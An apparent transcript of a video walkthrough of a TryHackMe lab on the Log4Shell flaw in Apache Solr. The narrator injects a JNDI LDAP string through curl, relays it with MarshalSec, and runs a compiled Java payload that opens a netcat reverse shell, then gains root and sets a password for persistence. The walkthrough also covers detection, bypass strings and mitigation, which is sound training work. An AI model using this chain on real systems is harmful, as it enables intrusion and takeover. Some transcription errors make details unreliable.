Hey, welcome back everybody. This is GHS InfoSec here, back with another TryHackMe video. And in this video, we're going to be looking at how to exploit the Log4j vulnerability, the vulnerability that seems to have shocked the world in the final quarter of 2021. This room is called Solar. And with that out of the way, let's go ahead and get started. Alright, so we are looking at this Log4j vulnerability in the Solar room. This is for CVE 2021-44228 and how to exploit this vulnerability. This room was created by John Hammond. If you haven't seen John's video on exploiting Log4j through Minecraft, I will link that in the video description below. It is a fantastic video and shows just how simple this vulnerability can be taken advantage of in order to get remote code execution. I'm going to go ahead and start this machine, and we'll take a look at the description here. It says, on December 9th, 2021, the world was made aware of a new vulnerability identified as CVE 2021-44228 affecting the Java logging package Log4j. This vulnerability earned a severity score of 10, which is the most critical designation. That's the highest score you can get, and offers trivial remote code execution on hosts engaging with software that utilizes this Log4j version. This attack has been dubbed Log4Shell, and today the Log4j version that's available is 2.16.0. It's available in patches this vulnerability, which is for the JNDI being fully disabled. Support for message lookups is removed, and the new denial of service vulnerability 2021-45046 is not present. And they have a link to this GitHub information here. However, the sheer danger of this vulnerability is due to how ubiquitous the logging package is. Millions of applications as well as software providers use this package as a dependency in their own code. While you may be able to patch your own code base using Log4j, other vendors and manufacturers will still need to push their own security updates downstream. Many security researchers have likened this vulnerability to that of shell shock by the nature of its enormous attack surface. We will see this vulnerability for years to come. For a growing community-supported list of software and services vulnerable to this vulnerability, check out this GitHub repo. And I've looked through this repo previously, some things I've done for work and whatnot, and there is quite a bit of information out here. A lot of really good information. It tells you what the manufacturer is of whatever component, whether or not it's verified that this is vulnerable or not. You can see some things are not vulnerable, but there is a long list of stuff here that is vulnerable. So I highly encourage you, if you work in IT security, to check this out. See what kind of applications you may have that are out there that are affected by this vulnerability, because it is immensely spread across the internet. All right, so let's get back over here to the challenge. It says here, this room will showcase how you can test for, exploit, and mitigate this vulnerability within Log4j. While there are a number of articles, blogs, resources, and learning materials surrounding the CVE, I, the author of this exercise, John Hammond, I guess, not me, him, and particularly partial to these. And these are actually some blog posts and a testing utility, I believe, that John has worked on with some of his coworkers. Also his YouTube video, which I talked about, will be linked in the description, where he hacks Minecraft and all that. So we'll just take a look at this blog post real quick. It lists all of the stuff that they've uncovered and all the updates for the Log4j and what releases you need to install for patching. It's a really good article. There's a lot of neat stuff in here, as well as this utility here, which allows you to test your own applications for the Log4j vulnerability. This is a really cool site. It allows you to test these things. If you see anything here, you definitely have some patching you need to do. So let's go ahead and head back over to the challenge. We have a note from the author. It says, please use the information you learn in this room to better the security landscape, test systems that you own, apply patches and mitigations where appropriate, and help the whole industry recover. This is a very current and real-world threat. Whether you're a pen tester, red teamer, incident responder, security analyst, blue teamer, or what have you, this exercise is to help you and the world understand and gain awareness on this widespread vulnerability. It should not be used for exploitive gain or self-serving financial incentive. I'm looking at you, bug bounty hunters. Additionally, please bear in mind that the developers of the Log4j package work on the open source project as a labor of love and passion. They are volunteer developers that maintain their project in their spare time. There should be absolutely no bashing, shame, or malice towards those individuals. As with all things, please further your knowledge so you can be a pedestal and pillar for the information security community, educate, share, and help. And that's true of all open source software. There's people that spend their free time essentially working on these packages, and mistakes will be made, but that's okay. I mean, that's just how we learn and grow as a community, and that's how we better ourselves in the world of cybersecurity. So let's go ahead and move on. This is answer the question below. Read and deploy the target virtual machine. We have done that. And we recommend you use their TryHackMe's web-based attack box for this scenario. I will not be using the attack box for this. I'll just go ahead and mark this as complete. But I will be using my own machine in this instance. So let's go ahead and look at the Reconnaissance section here. It says the target virtual machine includes software that utilizes this vulnerable Log4j package, offering you a playground to explore the vulnerability. All right, I'm going to go ahead and copy my IP address. So after deploying your virtual machine, you should find the IP address is accessible within the TryHackMe VPN or through the provided attack box, and is this IP here. Your IP will be different than mine. This is just the one that I have deployed from my machine. To begin, start with basic reconnaissance to understand what ports are open on this machine. This is best done with a Linux distribution like Kali or Parrot OS or Black Arch, or any other flavor you're choosing with Nmap. So let's hop on over to a terminal here, and let's go ahead and start an Nmap scan. Actually, before I even do that, I'm gonna use Rust scan just to get a quick look at what ports are open here, and I'm gonna give it my favorite options: -pn and -tac, and we'll just go ahead and see what ports are open on this. And so far, we know we have SSH, we have port 111. I know there will be several of the ports open here, but we'll just go ahead and let Rust scan run and see what we get open here. All right, it looks like we have port 8983. And before we move on with anything else, I'm going to open up a new window here, and we'll go ahead and fire up an Nmap scan to scan for what version of software is running on that port 8983. I believe that was the correct port. Yes, 8983. And then we'll give it our IP address, and we'll let this run. And while that's running, we're going to head back over here to our challenge. So it shows you how to just do a basic Nmap scan against the target. And then this second command here, the TAC option, just says to scan all the ports that are available on the machine. By default, it scans the first 1,000 ports whenever you just give it no options. But with the TAC, you can specify all ports. So we'll go ahead and mark it complete that we've started the scan. And it wants to know what service is running on port 8983. Just the name of the software. So let's see if our scan has already come back yet, and it has not. And let's see if we find anything else on Rust scan. So far, no more ports. So let's go back here, and it looks like our Nmap scan is done for this port, and it looks like we're running Apache Solar. So I'm going to just copy this and make a note of it, and let's go ahead and paste that down here. And that looks like the service we're looking for, which is great. Now on to the next section. We're given some task files to download. Now I've already gone ahead and downloaded these files, so we'll take a look at that in just a moment. And it says the target machine is running Apache Solar 8.11.0, one example of software that is known to include this vulnerable Log4j package. For the sake of showcasing this vulnerability, this application runs on Java 1.8.0 version 181. I actually have a different version of Java 8 here. I believe that would be, I have an alias to Java 8 on my machine. So I do know if you're running at least version 292, that this will work. I have tested this myself, and that's what I'll be using here. So let's go ahead and head back over to our challenge. And it says explore the web interface accessible at this IP address and this port. Click around to get a feel for the application. For more detail on Apache Solar, please refer to their official website, and they give us a link there. So let's go ahead and copy this IP address here and port, and we will take a look at this. I'm going to close these tabs here. So it looks like we have our Apache Solar dashboard, and it gives us a little bit of information about the server that's running, the specs. We get a little bit of runtime information, some arguments. Looks like we have a little bit of logging folders and installation directories, config directories, and things of that nature. So feel free to poke around on here a little bit and see what we've got here. Looks like we have a little bit of logging information. We could check the logging levels, which is pretty neat. Gives you a lot of information about different connection types, headers, authentication, execution chains. We can see the security information about it. So we can see that there's a warning security is not enabled for this server. I believe this is probably just a default vanilla install of Apache Solr and not really anything that has any type of configuration outside of just a plain straight up install right off of the site. A little bit of core admin. We could add a new core if we wanted to. We also have some Java properties, probably some useful OPSEC information in here. You can see here we're running on Linux, and we're looking at kernel version 4.15, I believe. Let's see. All kinds of other stuff here. I mean, this is just a hacker's dream to get this kind of information here. We can also see the Java runtime version, which is 1.8.0, build 181. And if we look at the thread dump, we get a little bit of information here about what's going on inside the threads in the CPU and all that. So let's head back to the dashboard, and we'll take a look at our challenge a little bit further. And it says here, the instance of Apache Solr is provisioned with no data whatsoever. It is a flat, vanilla, absolutely minimum installation, yet at its core, it's still vulnerable to this CVE. So we could definitely tell that based on what we were able to see throughout that dashboard for Apache Solr. So taking a look at the first page visible when navigating to the URL, you should be able to see clear indicators that Log4j is in use with the application for logging activity. What is the dsolr.log.dir argument set to display on the front page? So let's take a look and see if we can find that. So the dsolr.log.dir equals /var/solr/logs. So we're going to just go ahead and copy that value and paste that in here. And now we download the attached files accessible in the top right and see some example log files within Solr. Explore each file just to get a feel for what's displaying in the log. One file has a significant number of info entries showing repeated requests to one specific URL endpoint. Which file contains this repeated entry? Just the file name itself, no path is needed. So let's head over there. I'm going to add a little bit of time to this just in case it takes a while. Let's head back over to the terminal, and we're going to cd into ctf thm solr, and we'll take a look at, we have this solrlogs.zip. So let's unzip this, and looks like we have our log files now. So let's take a look at solr.log. That's most likely what we're going to need there. So let's pipe that into less solr.log, and we can see that we have this log file here. And if we scroll through here just a little bit, it looks like the path we're looking for here is going to be admin/cores. We also have a little bit of information about some type of argument we could potentially give for params, the status and the time and so forth. So let's go ahead and head back over to TryHackMe, and we said that was solr.log. What path or URL endpoint is indicated in these repeated entries? And that looked like it was admin cores. And viewing these log entries, what field name indicates some data entry point that you as a user could control? Just the field name. So if we go back and look at our logs, it looks like our data entry point is going to be this params option here. So we're going to just head back over here and we'll say params. And that looks like the correct answer. So we're going to keep moving on and take a look at the proof of concept. All right, note that the URL endpoint that you have just uncovered needs to be prefaced with the solr /prefix when viewing it from the web interface. This means you should visit this URL :8983/solr/admin/cores. So let's go on ahead and copy this, and we'll just open up a new tab and paste that in there. So now we can see that we get a little bit of JSON information with the response header, status, the queue time, any failures, and the status itself. So if we read on a little further, you also notice that param seems to be included in the log file. At this point, you may already beginning to see the attack vector. And it looks like, taking advantage of this URL here is where we're going to be able to launch our attack. This is going to be our attack point. So it says the Log4j package adds extra logic to logs by parsing entries, ultimately to enrich the data, but may additionally take actions and even evaluate code based off the entry data. This is the gist of the CVE. Other syntax may be in fact executed just as it is entered into the log files. And some examples of the syntax are as follows. So we could actually probably take this here and append this to our URL by adding a question mark and then pasting this in here. And we may not actually get what the query we're looking for is in this here, but this just, the fact that we didn't get an error code just shows that this is what, this vulnerability is valid. So this is how we will know that we have some type of exploitability here. So just a little bit more examples of syntax you may be able to use. System.user.name, the config parent location, the environment variable path, host name, the Java version, and so forth. And it says you may already know the general payload to abuse this Log4j vulnerability. The format of the usual syntax that takes advantage of this looks like this. When you have the $, open curly brace, JNDI, LDAP, and using the LDAP schema, / and our attacker controlled host, which will be, in this case, it'll be our IP address and a port and potentially some type of exploit Java class that we're going to be looking at creating later. The syntax indicates that the Log4j will invoke functionality from JNDI, or the Java naming and directory interface. Ultimately, this can be used to access external resources or references, which is what weaponizing in this attack. So it says, notice the LDAP schema, which we talked about here, and this indicates that the target will reach out to an endpoint, which we're controlling, so our attacker controlled location, via the LDAP protocol. For the sake of brevity, we will not need to cover all the ins and outs of details of LDAP, but know this is something you will need to work with as we refine our attack. For now, know that the target will in fact make a connection to an external location, and this is indicated by the attacker controlled host. So it's going to make a connection to our attacker machine here, which is going to be used with this LDAP schema. We'll have an LDAP, essentially an LDAP host with port open, where we are going to control the exploit code in order to redirect some remote code to the vulnerable machine. So where could we enter this syntax? And that could be anywhere that has data logged by the application. There'll be a little bit more examples of this in a little bit, but this is the crux of this vulnerability. Unfortunately, it is very hard to determine where the attack surface is for different applications and what applications are in fact vulnerable. Simply seeing the presence of Log4j files doesn't clue us in on the exact version number or even where or how the application might use the package. But essentially, with this vulnerability, the world is your oyster. You can do this in user agents, user form fields like username and password inputs, wherever, anything that you have control over as the requester of any type of information on a web server. If you think back to the previous task, you already discovered that you could supply params to the Solar admin cores URL. And now that you have a better understanding of how Log4j works, you should understand that this is where you supply your inject syntax. You can simply supply HTTP GET variables or parameters, which would then be processed and parsed by Log4j. All it takes is a single line of text, and that makes this vulnerability extremely easy to exploit. Other locations you might supply the JNDI syntax are input boxes, user password login forms, data entry points within applications, HTTP headers such as user agent, x-forwarded4, or other customizable headers. You can do all that through curl or burp suite or whatever, and any place for user supplied data. So I mean, the ability for an attacker to leverage this vulnerability is absolutely insane. I mean, this could take many forms of attack, and we'll see that in our example here later as we go through this. If you would like more information on this JNDI attack vector, please review the Black Hat USA presentation from 2016. So this is not a new vulnerability. This is something that's been around for quite a while. And in fact, I believe maybe even in 2015 was the first time this vulnerability was actually discovered. So let's go ahead and move along and get ready to run this exploit. So as a proof of concept, we're going to take a look at our own IP address. I already know mine is 10.6.67.211. Nothing to do here. So prepare a netcat listener and port 999 is an example. So let's go ahead and hop on over to the terminal. We'll quit this and we'll say nc-tac lnvp 9999. So we've got our netcat listener going. And now that we have our listener stage, we make a request to this primitive JNDI syntax as part of the HTTP parameters. It can be easily done with curl, and they give us an example here. So we'll just copy this, and we'll head back over to the terminal. And let's paste this in here. And where it says your attacker IP address, you want to take that out and put your own IP address. So in my case, it's 10.6.67.211. And we will hit enter. And it looks like we got our little response gizmo here. So let's head back over here and see if we got anything from NCAT. And it looks like we got a connection from the victim host here from an ephemeral port 47670 with some gobbledygook that doesn't really make any sense. But we know we have code execution here. We have a vulnerability, and we have the ability to take advantage of this. So I'm going to go ahead and just cancel this netcat listener for the moment, and we're going to keep moving. So just a little note, if you're using the $ character, you just have to escape those special characters like the $, or the open and closing curly braces and things like that. So we've already taken care of that. I'm using ZSH, and it will automatically do that for you. I don't know if you noticed that when I typed a command in, but when I pasted it in, we can see that the curly brace has been escaped automatically. And so just keep that in mind. And that may have actually come over from the command I copied, but a lot of times when you type in special characters like that with ZSH, it'll go ahead and do that for you. And so we verified that we received a connection. We can see that here. If we go back to our other terminal window, see that we got a connection from the IP address on port 47670. So we can mark this as complete and move on to the exploitation section. All right, it says at this point you have verified the target is in fact vulnerable by seeing this connection caught in your netcat listener, and we saw that. However, it made an LDAP request, so all your netcat listener may have been able to see was non-printable characters or strange-looking bytes. We can now build on this foundation to respond with a real LDAP handler. We will use an open source and public utility to stage an LDAP referral server, and this will be used to essentially redirect the initial request of the victim to another location, where you can host a secondary payload that will ultimately run code on the target. And it breaks down like this. So we have our JNDI inject code here, and our attacker server is going to be our IP address on port 1389, and then some resource which is going to reach out to our LDAP referral server. That referral server will springboard the request to a secondary resource at HTTP or attacker machine /resource, and the victim retrieves and executes the code present in that resource at HTTP attacker server /resource. So whatever we specified there. So this means we'll need an HTTP server, which we could simply host using Python or PHP or BusyBox or anything like that. They also have a link here. If you are using the attack box, they have a video showcasing it, how to gain remote code execution at this link here. So we've looked at the attack chain and we understand that. So the first order of business is obtaining an LDAP referral server. We will use the MarshalSec utility offered at this GitHub here. So if we take a look at this GitHub, you can just go ahead and clone this into a repository. I've already done that, so I have it in /opt. And if I take a look here, MarshalSec, here we go. So we're going to CD into MarshalSec. And then this is where we're going to get our LDAP referral service off of this utility here. Now if we head back to our TryHackMe page, ultimately this needs to run Java. Reviewing the README for this utility suggests using Java 8. You may or may not have success using a different version, but to play by the rules will match the same version of Java used on the target virtual machine. Now I'm using a little bit different version of Java, although it is still Java 8. It's just a different build number. And if you're not using the TryHackMe box, you need to follow the steps to below to move on to the next question. And so you can actually install this locally if you would like, and they give you some instructions on what you need to do here. Feel free to follow those if you do not have Java 8 installed on your machine. I'm going to go ahead and mark this complete because I already have Java 8 installed. No need for me to do that. So now we're going to go into our MarshalSec utility directory, which I've already done that. And we also need to use Maven. So this will basically is just a Java builder, and if you don't have that, you can install it through your package manager, which for a Debian based distribution, for example, is apt, sudo apt install Maven. I'm using Arco Linux, so I would use Pacman. They do have that in the community repository through Pacman. And then next we need to run this command to build the MarshalSec utility. So I'm just going to copy this command here, head back over to the terminal, and we're going to paste that in. And I am in my opt/MarshalSec directory. And we will go ahead and clear the screen, run this command, and we're going to let this run. All right, it looks like we're finished. So let's head back over to TryHackMe. It says also, please note the attack box for free users does not have internet and won't install the Maven packages. Either subscribe to complete this lab or install the MarshalSec utility locally. So I've already done that. I'm not using the attack box, so I can just mark this complete. So with the MarshalSec utility built, we can start an LDAP referral server to direct connections to our secondary HTTP server, which we'll prepare in a moment. You are more than welcome to dig into the usage parameters and other settings, but for the sake of demo, this syntax will start the LDAP server as follows. So I'm just going to copy this code here. This is what we're going to use. And let's head on over to the terminal, and we'll paste this in. And we want to make sure, again, where it says your attacker IP address, that we put in our machine address. So I got 10.6.67.211, and I'm going to go ahead and hit enter. And it says that we are listening on all interfaces on port 1389. So this is our LDAP referral server. It is listening and waiting for connections. So our next question is, what is the output of running this command? You should leave this terminal window open. And I believe that is what we are looking for. So I'm going to copy this and head back over to here and paste this in. And so essentially we're just looking at and listening on all interfaces. Our LDAP server is ready and waiting. We can open a second terminal window to prepare our final payload and the secondary HTTP server. Ultimately, the Log4j vulnerability will execute arbitrary code that you craft within the Java programming language. If you aren't familiar with Java, don't fret. We use a simple syntax that simply shells out to a running system command. In fact, we retrieve a reverse self connection so we can gain control over the target machine. So now we're going to create and move into a new directory where we might host this payload. First, create your payload in text editor of your choice. I'll be using NVim or NeoVim, Sublime Text, VS Code, garbage, whatever. Specify the name exploit.java. So we're going to create an exploit.java script, and this is going to be the code that we're going to use. So I'm going to head back to the terminal, and let's go back to another window, and I'm going to NVim exploit.java. And in here, I'm just going to paste this. And up here where it says your attacker IP, I'm going to change this to be my IP address, 10.6.67.211. Keep in mind yours will be different. And we're going to write and quit that. And then we're going to need to compile this code. And to do that, we'll use javac, and we will give it the exploit.java. Since we want to do it, I have two versions of Java on this machine, version 11 and version 8. I want to set the source to 8 and the target to 8, so that way it's using the correct version whenever it compiles this code. And now we have our exploit.class and exploit.java files here. And it says modify your attacker IP address. We did that. We're using 9999 as the example port number as before. So if we NVim our exploit.java once again, we are also using 9999 as you can see here. And so we want to make sure that you're specifying the correct port. For this payload, you will see we'll execute a command on the target, specifically nc tac/bin/bash to call back to our attacker machine. Let me go ahead and open that back up. So this is essentially what we're going to be doing. We're going to executing nc tac/bin/bash, and we want it to connect back to our machine on port 9999. So we're going to have a netcat listener listening on port 9999 in order to get code execution and get a shell back on this vulnerable machine. So if If we head back over here, this target has been configured with NCAT for ease of exploitation, though you're more than welcome to try experiment with other payloads. So perhaps you could use a interpreter payload or something of that sort. So we already compiled our code, and it gives you the option here, and it says if you are not using the attack box, you can remove source 8, target 8. I would recommend using that anyway, especially if you have 2 different versions of Java installed, just to make sure that you get the correct compilation for this vulnerability. So we've already compiled that, so we can mark this as complete. And now we can host it up by spinning up our HTTP server. So from the directory where our exploit.class file is at, that's where we want to start our Python server, or our web server, excuse me. So I'm going to do Python TACM http.server. We're using Python version 3. So now we can go over here. We'll mark this complete. It says our payload is created and compiled. It's hosted with an HTTP server in one terminal. Our LDAP referral server is up and waiting in another terminal. And now we got to prepare our netcat listener on port 9999 in order to execute this exploit. So if we look here, we also have our LDAP server still listening on all interfaces, port 1389. And I'm going to just go ahead and create a new window, and we will nc tac lnvp on port 9999. And now a new window once again, and we are going to go ahead and try to curl this here. So you want to make sure you use single quotes in your curl command. Essentially what we're doing is we're saying, hey, we're going to curl the vulnerable machine on port 8983, and then at solar admin cores where we found our vulnerability before, the parameter is going to be foo, and we're going to say JNDI LDAP at our IP address 1389, which is our LDAP referrer / exploit, because our exploit class is called exploit. If you called it Log4j, you'd want to put Log4j here, or A or B or whatever. Whatever you named your class, that's what we're calling. That's what we're going to run as our exploit code. So let's go back over here, paste this in, and we want to make sure that we put in our attacker IP address, so 10.6.67.211, and we're going to run this, and we get our response. So if we cycle back through our windows here, we can see that sent an LDAP reference result for exploit, redirecting to HTTP 10.6.67.211:8000 exploit.class. And if we look at our Python server, we can see that we got a GET request to exploit.class and HTTP 1.1 request with a status of 200. So that's a successful execution. And if we head back over to our netcat listener, we got a connection from 10.10.118.122 on port 47684. And if I run ID, I can see that I get some output. So I have a shell on this machine, and it looks like I am the user ID Solar, and we can verify that with who am I. And what I should have done is actually, I should have started up bash. Since I'm using ZSH, I should have started this with bash. So I'm going to go ahead and run the netcat listener on port 9999 once again, and then go back over here to our, here we go, to this is where we did our curl command. So I want to go ahead and execute this again. And now we can go ahead and we can get a proper shell. There's a way to do this with ZSH, but it's a little bit cumbersome. So let's take a look at which Python 3 and see that we do have Python 3. C, and we're going to say, Python 3, we're going to invoke the command import pty dot spawn. And we want to spawn /bin/bash, and we close that off. So now we have a bash shell. We can see what directory we're in. We get a little bit more information. Also, I believe we go ahead and they give us a little bit of information about how to properly gain a shell. But we can see at this point we could realistically do whatever we would like with the victim, whether it be privilege escalation, exploitation, persistence, lateral movement, any of the post-exploitation, potentially dropping remote access Trojans, crypto miners, beacons, endpoints, or even deploying ransomware. Pretty huge deal. I mean, we've got remote code execution on this machine. So now, it says here, as an exercise for the reader, can you get a interpreter shell loaded? How about an Empire agent, Cobalt Strike beacon, etc.? So let's head back over here, and we're going to Control Z to send this to the background, and we'll stty raw minus echo, and then foreground. And now we should be able to control U and do various things and have a proper shell without any type of problems. So if we control C, we're not going to kill ourselves out of our shell. So now let's go ahead and take a look at what we've got here. Let's see if we can escalate our privileges. Let's see what kind of pseudo privileges we have. And it looks like we can run all with no password. So let's go ahead and just sudo bash. And now we're root. So who am I? If I can spell, who am I? We're root. So we have completely owned this machine. This is pretty sweet. So let's go ahead and head back over to the challenge and see what else we have. We have several more tasks. We've already rooted the machine, so I'm not sure what else we got to do here. But now we're looking at persistence. So now that we gain a reverse shell on the victim, you can continue to take any action you might like. To better understand the Log4j vulnerability, let's grant ourselves better access so we can explore the machine, analyze the affected logs, and even mitigate the vulnerability. You notice from Nmap that port 22 SSH was open on the host. We did not know any usernames and passwords at this point, so trying to access that protocol will be useless. But now that we have code execution as a user, you could potentially add private keys or change passwords. So we actually, when we initially gained access to this machine, we were the Solar user. But we have already gone ahead and done these things, and we have actually a stable shell, and we have root access to that machine. The one thing I did not do is export term equals xterm, but that's okay. We've already stabilized our shell, so if I start typing something, Control C, it's not going to kill me out of the shell. We've already got root on this machine. Sudo tackl, this is just boilerplate stuff that you would do going through that. We knew that we were able to run any command as root, so we went ahead and did bash. We could actually, okay, so we want to change the password for Solar. That's cool. Let's go ahead and do that. Let's say password Solar, and let's just make it Solar. So now if we wanted to, we could SSH in as Solar to our 10.118.122. I mean, we've pretty much already gotten what we needed out of this machine. But now, if we wanted to have SSH access and establish some persistence, we've already done that. Once again, we can sudo bash, and we have root, and we've got an SSH connection to the server. Pretty cool stuff. Very cool challenge. Let's see. Detection. So let's see how they recommend we go about detecting this. Unfortunately, finding applications vulnerable to the CVE Log4 shell is hard. Detecting exploitation might be even harder considering the unlimited amount of potential bypasses. But one thing that we saw in this discovery information, maybe not in discovery, reconnaissance, proof of concept. All right, I'm having a little trouble finding this. One way that we saw that we could potentially find this is by using this log4shell.huntress.com URL. I personally have used this to test Log4j in my workplace, and this is a great resource. Fortunately, I was not able to find anything that was vulnerable. Everything had already been patched prior to me discovering this tool, but this would be a great tool to test things for the vulnerability. Also, be sure to check your log files. Look for things like the JNDI LDAP syntax in the in your log files, or if you are capturing network traffic, you can do the same thing with Wireshark. I actually meant to run a Wireshark capture on this while I did this. I may run through this again off camera and see if I can capture some exploit traffic with Log4j, because obviously we know we're making a callback to our LDAP refer server, and we're getting an exploit code and remote code execution. So that would be really interesting to check out offline. But other than that, there are some other resources to give a little bit more information on discovering this stuff. So explore your SSH connection or reverse shell to move to directory where the logs are stored. We already know all this stuff here. It's in task 3. So the logs were stored in /var/solar/logs, I believe. Yep. And so now we have a list of the logs that we had already downloaded the zip file that had these, but if we wanted to take a look at less on solar.log, we may be able to see where we were able to get our information and run our exploit code. Yeah, so we can see in this log entry here, our params were foo equals jndi ldap :/10.6.67.211.9999. So you can also see where we did our LDAP refer to the exploit code, and then we got our reverse shell. So be sure to check your log files if you are running an application that uses Log4j as a logging mechanism, because you will see this stuff, and you may see it in some type of obfuscated format, but you at the very least, just as a plain vanilla, simple out of the box exploit, this is what it would look like in your log files. So let's head back on over here, and we can mark these as completed. We know that we reviewed the log file. Okay. Notice your JNDI attack syntax included in the log entries. Yes. So like we just talked about, you can totally see the exploit that was run in the log syntax. We have our foo parameter and all that stuff once again, so we don't need to go through that again. We can mark this as complete. Bypasses. Okay, this is interesting because some of these things I've actually seen in my workplace as well, where I've been looking through log files. This one is pretty popular, where they're using just a lower method to lowercase JNDI or RMI, and then the attacker endpoint. Same thing with all these various different bypasses, trying to bypass any web application firewalls or any kind of type of IDS, IPS that may be looking for these things. The typical syntax is what we saw for trying to exploit that as the proof of concept, but any of these bypasses may also be present. So I would make a note of these and put these in your IDS rules or in your Elastic or Splunk rules to detect this type of behavior, because these will certainly be exploited if they're not using the typical stuff. It says note use of RMI in the protocol in the last one. There's also another valid technique that can be used with the MarshalSec utility. So there's many different options you can go through with MarshalSec. Additionally, within the Log4j engine, you can expand arbitrary environment variables. If this wasn't already bad enough, consider the damage that can be done even with remote code execution. But a simple LDAP connection and exfiltration of an AWS secret access key, that's another one. That's kind of takes me back to the AOC Advent of Cyber 3, the AWS room. If you have some type of S3 bucket or AWS server out there, this could be incredibly dangerous. For other techniques, you're strongly encouraged to do your own research. There's a significant amount of information being shared on Reddit. It's just another resource for you in this Log4j vulnerability. General reminder to use this knowledge for good. You know what they say, great power, great responsibility, and all. Yes, that is absolutely true. Remind yourself that you are a good security professional with a strong moral compass. Absolutely. I don't advocate for any type of illegal activity. I strongly encourage people to try these rooms and learn these techniques and learn how to hack and do that sort of stuff. But it's so that we as the good guys can make sure that we are doing our part to protect everyone else. Not necessarily the Robin Hood mentality, steal from the rich and give to the poor, but you want to know what the bad guys are doing and how they're doing it, so you can hone your craft and really focus your efforts, if you're a blue teamer, on securing your environment and making sure that things stay secure. All right, moving on. Now we've acted as the adversary for a little bit. Take off your hacker hat and let's mitigate this vulnerability on this vulnerable machine. Review the mitigation techniques suggested on the Apache Solr website, which would be found here. One option is to manually modify the solr.in.sh file with a specific syntax. Let's go down that route for the sake of showcasing this defensive tactic. If you want to directly SSH into the machine, credentials are vagrant as the username and vagrant as the password. So we are already logged in, we're already root. We can go ahead and find this solr.in.sh. So I like to, it looks like he's recommending using locate solr.in.sh. Etsy default solr.in.sh. A lot of times what I'll do is I will use find / dash name and then whatever name, and 2 is greater than dev null. That's another useful technique for you. So let's go ahead and let's vim this file. And it looks like we need to, what is the full path? Let's go ahead and paste this in here. And the Apache Solr website security page explains that you can specify the syntax in this file. So we should be able to add this syntax here. So essentially what we're doing is modifying the format message no lookups, setting it to true. By default, it must be set to false. So if we set that to true, it is not going to use the format message to do any type of lookup. So it's essentially going to neutralize the remote code execution ability of this Log4j application. So let's go ahead and head back over here, and let's head to the bottom, and we will just, is that something that's already in there? dlog4j2. Let's head back. Let's see if we can actually find that. So dlog4j2. That is not already in there, so we're just going to paste that in there and write that and quit, and we should be able to restart that service. And we'll just copy this command here and paste it, and there we go. All right, and it looks like we are restarted. So, and now let's go ahead and head back over to the terminal. So it looks like we're going to try testing our vulnerability once again. So I'm going to leave my SSH connection. I'm going to leave the Python server running, and this we're going to exit, and see if we can Control C. It looks like we may have to kill this window. Let's X kill that one, yes, and start up a new one. NC tag LNVP 9999. Now if we head back over here, okay, let's go to this window here. So now we have our netcat listener. It's waiting. Let's go ahead and see if we can curl this once again. So it looks like that worked, but we're not getting a connection back to the server. So it looks like our patch actually worked. We were able to successfully mitigate this vulnerability. So that's very cool. I like that, the fact that John showcased how to patch this vulnerability. He's doing a great job in making sure that not only is he showing how to hack these things, but also how to mitigate them and defend against them. Because, as he said in the initial comments of this server, or of this room in TryHackMe, this is a widespread vulnerability, and it is a huge liability to places everywhere. Because as you recall, we were able to get root access nearly instantly once we exploited it. And now moving on to patching. At the time of creating this exercise, Apache Solr 8.11.1 has not yet been released with a formal patch for this vulnerability. Alongside many other software providers, the industry is frantically scrambling to patch the software and push it downstream to end users as quickly as they can. Please be understanding of this frenzy. There are so many potential places that this vulnerability could be present. We may never see the end of this vulnerability for a long, long time. And that's absolutely true. This is a big one. You saw the list at the GitHub repository. I've seen other ones that are a mile long of how many vendors and applications have this vulnerability. The onus is on you and me and each and every one of us to raise awareness of this incident and hold the community accountable for actively responding. When the time comes, roll out the patches that have been made available and continue to hunt for instances of this vulnerability. It takes a village, and that's true. Please be sure, if you are running any type of application in your work environment that uses Log4j, that you patch it. This says to patch it at least to version 2.16.0 or higher. I've actually seen some recommendations to go to 2.17 already. So this may even be something that's vulnerable. I don't know that it is, but it never hurts to be at the latest whenever this type of vulnerability exists. JNDI is fully disabled in this version. Support for message lookups is removed, and the new DOS vulnerability CVE 2021-450-406 is not present. Download this release here, and they give you a link to that right there. If you're responsible for identifying vulnerable services that use Log4j, there's a list of a few majorly affected services or products here. So be sure to check that out. And we answer, this is like a end user license agreement. I understand the implications of this and will patch early, often, and always. Yes, I will do that. I can mark that completed. So towards the end here, credits and author's notes. Thanks for clicking all the way to the end, and I sincerely hope you read these parting words. This exercise is brought to you with the wholehearted intent that improves your awareness, learning, and understanding of this vulnerability for the right reasons. The material presented to you could not have been possible without the incredible contributions from security researchers, incident responders, system administrators, and security practitioners all throughout the industry. We owe an incredible thank you to the professionals all working sleepless nights around the clock, foregoing the weekend and time with friends and family to better protect the entire internet. While Hollywood hacking is cool and flashy, cybersecurity is a team sport. Please review the external resources and make the community a better place. I totally agree. This is not just a one-man show. You can't be a hero and be Conan the Barbarian and go do it all yourself. Understanding these things for the right reasons, being a part of the cybersecurity community and whatnot, it is absolutely essential that you do these things for the right reasons. You do it to protect the innocent. And I want to give a huge shout out to John Hammond for creating this room. He probably would never hear my name or see this video, but John, this is absolutely fantastic. I thoroughly enjoyed this room. I sincerely appreciate your willingness to share this stuff, share the attack, share the defense, get the information out there and make everyone aware of these vulnerabilities and, just doing your thing, man. Really appreciate it. This was a long one. If you stuck around to the end of this, I thank you so much. Thank you to all my subscribers. Please continue to like and subscribe. Share this kind of stuff with people you think may be interested in this type of content. If you're not subscribed already, I please encourage you to do so. Please like and subscribe. Thank you so much again for taking the time to watch. Be on the lookout for more stuff in 2022. We're wrapping up the end of the year, and thank you so much for watching. Take care, everyone.